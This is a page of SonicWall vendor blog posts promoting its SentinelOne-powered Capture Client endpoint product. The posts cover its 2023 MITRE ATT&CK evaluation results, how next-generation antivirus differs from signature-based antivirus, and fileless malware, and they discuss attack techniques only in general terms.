Posts

What the 2023 MITRE ATT&CK Evaluation Results Mean for SonicWall Users

Note: Previously, we explained the MITRE ATT&CK framework and how security products are evaluated for detection efficacy and efficiency. Check out these blogs (Part 1 and Part 2) if you haven’t already.

The 2023 MITRE ATT&CK® Evaluations focused on the adversary Turla, a Russia-based threat group active since at least the early 2000s. Turla is known for deploying sophisticated proprietary tools and malware. It has targeted victims in over 45 countries, spanning a range of critical industries and infrastructure such as government agencies, diplomatic missions, military groups, research and education facilities, and media organizations.

But while Turla is unquestionably a formidable adversary, it proved no match for the SentinelOne-powered SonicWall Capture Client, as we’ll explore below.

Understanding MITRE ATT&CK and SonicWall Capture Client

Before we dive in, however, a bit of background on the MITRE ATT&CK evaluations and SonicWall Capture Client is likely to be helpful:

MITRE ATT&CK Evaluations: ATT&CK stands for “Adversarial Tactics, Techniques & Common Knowledge.” It’s designed to be a common language, the components of which are used in endless combinations to describe how threat actors operate. The MITRE Engenuity ATT&CK Evaluations are based on the MITRE ATT&CK knowledge base, a globally accessible repository of threat actor behaviors and techniques observed in real-world cyberattacks. The evaluations provide transparency and insight into how well different cybersecurity solutions can detect and prevent these tactics, as well as how they present relevant information to end users.

SonicWall Capture Client Endpoint Security: SonicWall Capture Client is a cutting-edge endpoint security solution powered by the SentinelOne Singularity platform. It leverages multiple layers of security – including real-time behavior monitoring, anti-ransomware technology and malware prevention – to automatically detect and prevent malicious activity in real time, without relying on signatures, rules or human intervention.

To reduce alert fatigue, Capture Client automatically stitches together related alerts, providing analysts with a full view of detections across all covered attack vectors correlated into several incidents.

Capture Client’s built-in, autonomous EDR provides automation and orchestration capabilities for rapid response and remediation actions. What’s more, Capture Client’s synergy with the rest of the SonicWall platform allows for increased visibility and protection both on and off the network.

The 2023 MITRE ATT&CK Evaluations

The 2023 MITRE ATT&CK Evaluations emulated Turla to test 30 cybersecurity vendors on their ability to detect and respond to an advanced real-world threat. Evaluation results are available on the official website, where you can view and compare the test data of each vendor across 143 sub-steps that represent the attack sequence of Turla. You can also filter the results by different criteria, such as detection type, telemetry type, platform or technique.

The test data consists of three main categories:

  • Visibility: Evaluates whether the vendor was able to detect a specific sub-step of the attack sequence and what type of telemetry (e.g., process, file, registry, network) was used to provide that detection. The higher the visibility score, the more sub-steps were detected by the vendor.
  • Analytic Quality: Evaluates the quality of the detection analytics (e.g., rules, signatures, models) used to identify a specific sub-step of the attack sequence. The analytic quality score ranges from 1 (lowest) to 5 (highest) based on criteria such as specificity, relevance, timeliness, accuracy and completeness. The higher the analytic quality score, the better the detection analytics were at capturing the adversary’s behavior.
  • Configuration Change: Evaluates whether the vendor required any configuration changes (e.g., enabling or disabling features, modifying settings) to achieve a specific detection. The configuration change score ranges from 0 (no change) to 2 (major change) based on criteria such as complexity, impact and documentation. The lower the configuration change score, the fewer changes were needed by the vendor.

SentinelOne: Once Again at the Front of the Pack

SonicWall customers trust our SentinelOne-powered Capture Client to protect them from the most advanced threats. In this year’s Evaluations, the exact agent, platform and features used to safeguard SonicWall users every day detected and blocked every phase of the Turla attack with zero delays and no unrealistic reconfigurations or bolt-on features.

It outperformed all other vendors in terms of detection and prevention capabilities, as well as analytic quality and configuration changes.

Figure 1 shows exactly what Capture Client (SentinelOne) achieved:

Figure 1: SentinelOne MITRE ATT&CK Evaluation results

These results highlight how the SentinelOne Singularity platform maps directly to the MITRE ATT&CK framework to deliver unparalleled detection and prevention of advanced threat actor tactics, techniques and procedures (TTPs). SentinelOne Singularity XDR also provides real-world information to defenders without any configuration changes4 – because there are no re-tests in the real world.

Figure 2: A closer look at SentinelOne evaluation results.

By choosing Capture Client (SentinelOne) for your organization, your organization can benefit from:

  • Autonomous Protection: Automatically detect and prevent malicious activity in real time across all attack surfaces.
  • High-Quality Analytics: Leverage high-quality analytics of threat behavior with specificity, relevance, timeliness, accuracy and completeness.
  • Zero Configuration Changes: Enjoy optimal performance without any configuration changes, reducing complexity and overhead
  • Real-Time Visibility: Gain comprehensive visibility into the attack sequence and timeline, as well as threat intelligence, indicators of compromise (IOCs), root cause analysis and remediation steps.
  • Automation and Orchestration: Automate and orchestrate response and remediation actions with protection that integrates with other security tools and platforms.

Figure 3: Capture Client provides real-time visibility with Attack Storyline, which displays an attack in its entirety and combines alerts and individual events into a single, comprehensive view.

Conclusion

The MITRE ATT&CK Evaluation provides transparent and objective data, which allows vendors and users the ability to compare different cybersecurity solutions based on their ability to detect and prevent real-world threats. For those looking to purchase a reliable and effective cybersecurity solution, these results can help determine which one best suits their needs and goals.

For four consecutive years, SonicWall Capture Client has proven its industry-leading detection and protection capabilities in the MITRE ATT&CK Enterprise Evaluations. You can request a demo or a free trial of Capture Client, or compare SonicWall Capture Client (SentinelOne) with other vendors on MITRE Engenuity’s website.

The Evolution of Next-Generation Antivirus for Stronger Malware Defense

Threat detection has evolved from static to dynamic behavioral analysis to detect-threatening behavior. Comprehensive layers of defense, properly placed within the network and the endpoint, provide the best and most efficient detection and response capabilities to match today’s evolving threats.

For years, SonicWall offered endpoint protection utilizing traditional antivirus (AV) capabilities. It relied on what is known as static analysis. The word “static” is just like it sounds. Traditional antivirus used static lists of hashes, signatures, behavioral rules and heuristics to discover viruses, malware and potentially unwanted programs (PUPs). It scanned these static artifacts across the entire operating system and mounted filesystems for retroactive detection of malicious artifacts through scheduled scanning.

Traditional antivirus focuses on pre-process execution prevention. Meaning, all the scanning mechanisms are primarily designed to prevent the execution of malicious binaries. If we go back 20 years, this approach was very effective at blocking the majority of malware, and many antivirus companies capitalized on their execution prevention approaches.

As that technology waned, the provider we had for traditional antivirus discontinued their legacy antivirus solution and SonicWall sought new and more effective alternatives.

Traditional Defenses Fail to Match the Threat

In the past, attackers, determined to beat antivirus engines, focused much of their attention on hiding their activities. At first, the goal of the attacker was to package their executables into archive formats.

Some threat actors utilized multi-layer packaging (for example, placing an executable into a zip then placing the zip into another compression archive such as arj or rar formats). Traditional antivirus engines responded to this by leveraging file analysis and unpacking functions to scan binaries included within them.

Threat actors then figured out ways to leverage documents and spreadsheets, especially Microsoft Word or Excel, which allowed embedded macros which gave way to the “macro virus.”

Antivirus vendors had to become document macro experts, and Microsoft got wise and disabled macros by default in their documents (requiring user enablement). But cybercriminals didn’t stop there. They continued to evolve the way they used content to infect systems.

Fast forward to today. Threat actors now utilize so many varieties of techniques to hide themselves from static analysis engines, the advent of the sandbox detection engine became popular.

I often use an analogy to explain a malware sandbox. It’s akin to a petri dish in biology where a lab technician or doctor examines a germ in a dish and watches its growth and behavior using a microscope.

Behavioral Sandbox Analysis

Sandbox technologies allow for detection by monitoring malware behavior within virtual or emulated operating systems. The sandboxes run and extract malware behavior within these monitored operating system to investigate their motives. As sandboxing became more prevalent, threat actors redesigned their malware to hide themselves through sandbox evasion techniques.

This led SonicWall to develop advanced real-time memory monitoring to detect malware designed to evade sandbox technology. Today, SonicWall uses a multitude of capabilities — coupled with patent-pending Real-Time Deep Memory Inspection (RTDMITM) — to identify and mitigate malware more effectively than competing solutions.

SonicWall Automated Real-Time Breach Prevention & Detection

The Endpoint Evolves, Shares Intelligence

Next comes the endpoint. As we know, most enterprises and small businesses are mobile today. Therefore, a comprehensive defense against malware and compliance must protect remote users and devices as they mobilize beyond an organization’s safe perimeter. This places an emphasis in combining both network security and endpoint security.

Years ago, I wrote research at Gartner about the gaps in the market. There was a critical need to bridge network, endpoint and other adjacent devices together into a shared intelligence and orchestrated fabric. I called it “Intelligence Aware Security Controls (IASC).”

The core concept of IASC is that an orchestration fabric must exist between different security technology controls. This ensures that each control is aware of a detection event and other shared telemetry so that every security control can take that information and automatically respond to threats that emerge across the fabric.

So, for example, a botnet threat detection at the edge of the network can inform firewalls that are deployed deeper in the datacenter to adjust policies according to the threat emerging in the environment.

As Tomer Weingarten, CEO of SentinelOne said, “Legacy antivirus is simply no match for today’s sophisticated file-based malware, which proliferates much faster than new signatures can be created.”

Limitations of Legacy Antivirus (AV) Technology

To better understand the difference between legacy antivirus (AV) and next-generation antivirus (NGAV), we should know the advantages and unique features of NGAV over legacy signature-based AV solutions. Below are four primary limitations of legacy offerings.

  • Frequent updates. Traditional AV solutions require frequent (i.e., daily or weekly) updates of their signature databases to protect against the latest threats. This approach doesn’t scale well. In 2017 alone, SonicWall collected more than 56 million unique malware samples.
  • Invasive disk scans. Traditional AV solutions recommend recurring disk scans to ensure threats did not get in. These recurring scans are a big source of frustration for end users, as productivity is impacted during lengthy scans.
  • Cloud dependency. Traditional AV solutions are reliant on cloud connectivity for best protection. Signature databases have grown so large that it is no longer possible to push the entire database to the device. So, they keep the vast majority of signatures in the cloud and only push the most prevalent signatures to the agent.
  • Remote risk. In cases where end-users work in cafés, airports, hotels and other commercial facilities, the Wi-Fi provider is supported by ad revenues and encourage users to download the host’s tools (i.e., adware) for free connectivity. These tools or the Wi-Fi access point can easily block access to the AV cloud, which poses a huge security risk.

Switching to Real-time, Behavior-focused Endpoint Protection

Considering these limitations, there is a need for viable replacement of legacy AV solutions. For this reason, SonicWall partnered with SentinelOne to deliver a best-in-class NGAV and malware protection solution: SonicWall Capture Client.

SonicWall Capture Client is a unified endpoint offering with multiple protection capabilities. With a next-generation malware protection engine powered by SentinelOne, Capture Client applies advanced threat protection techniques, such as machine learning, network sandbox integration and system rollback. Capture Client uses automated intelligence to adapt and detect new strains of malware through advanced behavior analytics.

SonicWall Capture Client was a direct response to multiple market trends.

  • First, there has been a detection and response focus, which is why SentinelOne offers our customers the ability to detect and then select the response in workflows (along with a malware storyline).
  • Second, devices going mobile and outside the perimeter meant that backhauling traffic to a network device was not satisfying customers who wanted low latency network traffic for their mobile users (and, frankly, the extra bandwidth costs that go along with it).
  • Third, because of all the evasion techniques that attackers use, a real-time behavioral engine is preferred over a static analysis engine to detect advanced attacks.
  • Fourth, the Capture Client SentinelOne threat detection module’s deep file inspection engine sometimes detects low confidence or “suspicious” files or activities. In these low confidence scenarios, Capture Client engages the advanced sandbox analysis of RTDMI to deliver a much deeper analysis and verdict about the suspicious file/activity.

One crucial feature of the latest Capture Client solution is the ability to record all the behaviors of an attack and the processes involved on an endpoint into an attack storyline — essential for security operations detection, triage and response efforts.

By listening to the market and focusing on the four key points above, SonicWall delivered best-in-class protection for endpoints, and another important milestone in SonicWall’s mission to provide automated, real-time breach detection and prevention.

SonicWall Capture Client combines multiple technologies to provide the most efficient and effective defense against threat actors. The solution should be paired with a defense-in-depth security strategy across all the key layers of transport, including email, network and endpoints.

What is the Difference Between Traditional and Next-Generation Anti-Virus?

In previous webcasts and blogs, I’ve spoken of a woman who was the victim of a terrible ransomware attack as well as an intrusion on her computer. It was her first computer breach in over 25 years of business.

When these happened, she was running traditional anti-virus and minimal network security in front of her endpoints. These two attacks, which she believes cost her around $50,000 in damages, were alarming wakeup calls to the realities of today’s threat landscape.

One of the lessons learned by people like Elizabeth over the past three years of the ransomware age is that traditional signature-based anti-virus solutions are lacking the power to combat today’s flood of evasive malware.

This is why SonicWall is excited to launch our Capture Client, a client security solution that leverages the SentinelOne Endpoint Protection engine, powered by static and behavioral artificial intelligence, to deliver next-generation anti-virus (NGAV) capabilities.

So, what exactly is a NGAV solution, and why does it matter?

No signatures

Traditionally, anti-virus solutions (AVs) have required frequent (daily or weekly) updates of their signature databases to protect against the latest threats. Capture Client uses a static artificial intelligence (AI) engine to determine if new files are threats before they can execute. In addition, it has a behavioral AI engine to protect against file-less threats (e.g., PowerShell scripts, macros within documents, lateral movement, etc.).

No weekly updates

These AI engines do not require daily/weekly updates, as they “degrade” very gracefully over time. This is because the behavior analysis engines do the work instead of matching files to an ever-aging database of file IDs.

Even if customers upgrade their agents only once a year, they will have much greater protection than what traditional AV is able to provide. With the power of SentinelOne’s AI models, today’s zero-day attacks are instantly convicted by models developed in the past. This is the benefit of a mathematical approach to malware prevention, detection and response versus legacy, signature-based approaches.

No recurring scans

Apart from the management overhead of updating signatures, traditional AVs also recommend recurring disk scans to make sure threats did not get in. These recurring scans are a big source of frustration for the end users, as their productivity is impacted during the scans. With Capture Client, these recurring scans are not required at all. End-users get much better performance and, in many cases, do not even know or experience any slowdown caused by the AV.

No performance overhead

Another reason for the poor performance of traditional AVs is that they became bloated by implementing many features, such as endpoint firewall, full-disk encryption, etc. Many of these features are now available on modern operating systems. Capture Client was designed to orchestrate OS functionality instead of replicating it. This also translates into a much better end-user experience.

No cloud dependence

Another limitation of traditional AVs is their reliance on cloud connectivity for best protection. Signature databases have grown so large that it is no longer possible to push the entire database down to the device. So, they keep the vast majority of signatures in the cloud, and only push the most prevalent signatures down to the agent.

Furthermore, end users frequently work in cafés, airports, hotels and other commercial facilities. In most of these cases, the Wi-Fi provider is supported by ad revenues, and encourage users to download the host’s tools (i.e., adware) to get free connectivity. These tools or the Wi-Fi access point can easily block access to the AV cloud, which poses a huge security risk. Capture Client is fully autonomous and protects the user in these situations. The efficacy of the agent isn’t impacted by its connection to the internet.

NGAV for endpoints

I invite you to learn more about Capture Client, which not only provides NGAV capabilities, but also seamlessly integrates with SonicWall firewalls and related capabilities, such as DPI-SSL certificate management, firewall enforcement and firewall-independent, cloud-based reporting.

To learn more, download the “SonicWall Capture Client powered by SentinelOne” data sheet.

How to Stop Fileless Malware

In 2017, SonicWall Capture Labs discovered 56 million new forms of malware from across the globe. Threat actors are constantly creating updates to known versions of malware to get past defenses that rely on identifying malware (i.e., signatures). The forms of security that stop malware and ransomware based on signatures are only effective if they can identify the strain.

Since malware authors don’t want to continually update their code and have attacks in flight fail, they often resort to creating fileless malware as a highly effective alternative.

What is fileless malware?

Fileless malware has been around for some time, but has dramatically increased in popularity the last few years. These malware leverage on-system tools such as PowerShell, macros (like in Microsoft Word and Excel), Windows Management Instrumentation or other on-system scripting functionality to propagate, execute and perform whatever tasks it was developed to perform.

The problem for the business

One of the reasons fileless malware is so powerful is that security products cannot just block the systems or software that these are utilizing. For example, if a security admin blocked PowerShell, many IT maintenance tasks would be terminated. This makes it impossible for signature-based security solutions to detect or prevent it because the low footprint and the absence of files to scan.

How can SonicWall stop fileless malware?

The key is not to look at the file but, instead, look at how it behaves when it runs on the endpoint. This is effective because although there is a large and increasing number of malware variants, they operate in very similar ways. This is similar to how we educate our children to avoid people based on behavior instead of showing them a list of mug shots every time they leave home.

SonicWall Capture Client, powered by SentinelOne, is a next-generation antivirus endpoint protection platform that uses multiple engines, including static and behavioral AI, to stop malware before, during and even after execution. It also offers the ability to roll back an endpoint to a state before the malware got on to or activated on the system.

In the face of fileless malware, the full behavioral monitoring approach is amazing at detecting and preventing this type of attack because it is agnostic to the attack vector.

How does it work?

SonicWall actively monitors all activities on the agent side at the kernel level to differentiate between malicious and benign activities. Once Capture Client detects malicious activity, it can effectively mitigate an attack and, if needed, roll back any damage, allowing the user to work on a clean device.

Conclusion

Ultimately, adversaries will always take the shortest path to compromise endpoints to ensure the highest return with the least amount of effort. Fileless malware is quickly becoming one of the most popular ways to do so. It is not enough to just block essential operations like PowerShell.

You need anti-virus software that fully monitors the behavior of a system to prevent attacks utilizing exploits, macro documents, exploit kits, PowerShell, PowerSploit and zero-days vulnerabilities locally and without dependence to network connectivity.

To learn more, download the in-depth data sheet, “SonicWall Capture Client powered by SentinelOne.”

Webinar: Stop Fileless Malware with SonicWall Capture Client

Join SonicWall and SentinelOne cyber security experts to learn how to stay safe from advanced cyber threats like fileless malware.